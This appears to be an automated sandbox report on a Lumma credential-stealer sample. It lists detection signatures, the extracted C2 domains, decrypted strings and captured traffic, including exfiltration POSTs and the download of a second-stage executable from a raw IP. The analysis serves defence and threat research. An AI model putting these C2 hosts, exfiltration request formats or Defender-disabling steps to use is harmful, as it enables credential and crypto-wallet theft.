Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1543207
MD5:	84eeaf8b6dac33d7e5de9256769ca8c8
SHA1:	eb1e3025548095128a6602d062d180192e7e88b1
SHA256:	58700ccf44cdd5f10ce7711543d93401dcd4e6328195173d25ffc6eba42bddc7
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 1400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 84EEAF8B6DAC33D7E5DE9256769CA8C8)

02FQBW3AYVFKS8DMY3O.exe (PID: 1412 cmdline: "C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe" MD5: 20660C078959F3893C738609A956DEA5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["thumbystriw.store", "founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "presticitpo.store", "crisiwarny.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2129877489.00000000017E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2129358643.00000000017E2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 1400	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 1400	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T12:13:04.262944+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.95.91	443	TCP
2024-10-27T12:13:05.450304+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.95.91	443	TCP
2024-10-27T12:13:15.913204+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49711	104.21.95.91	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T12:13:04.262944+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.95.91	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T12:13:05.450304+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	104.21.95.91	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T12:13:16.838489+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49712	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T12:13:11.348881+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.95.91	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T12:13:12.717726+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49710	104.21.95.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: file.exe.1400.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "presticitpo.store", "crisiwarny.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: scriptyprefej.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: navygenerayk.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: founpiuer.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: necklacedmny.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: thumbystriw.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: fadehairucw.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: crisiwarny.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 4SD0y4--legendaryy

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49711 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000003.2276067053.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49710 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 104.21.95.91:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: fadehairucw.store

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 27 Oct 2024 11:13:16 GMTContent-Type: application/octet-streamContent-Length: 2720768Last-Modified: Sun, 27 Oct 2024 10:07:55 GMTConnection: keep-aliveETag: "671e10fb-298400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 3f 26 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 63 6b 6a 69 76 78 73 00 40 29 00 00 a0 00 00 00 22 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 71 66 7a 64 79 6f 73 00 20 00 00 00 e0 29 00 00 06 00 00 00 5c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 62 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 104.21.95.91 104.21.95.91
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49712 -> 185.215.113.16:80

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1247Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568574Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic

HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store

Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/B
Source: file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261446385.000000000133A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeM
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exev
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microP
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2111402565.0000000005E29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
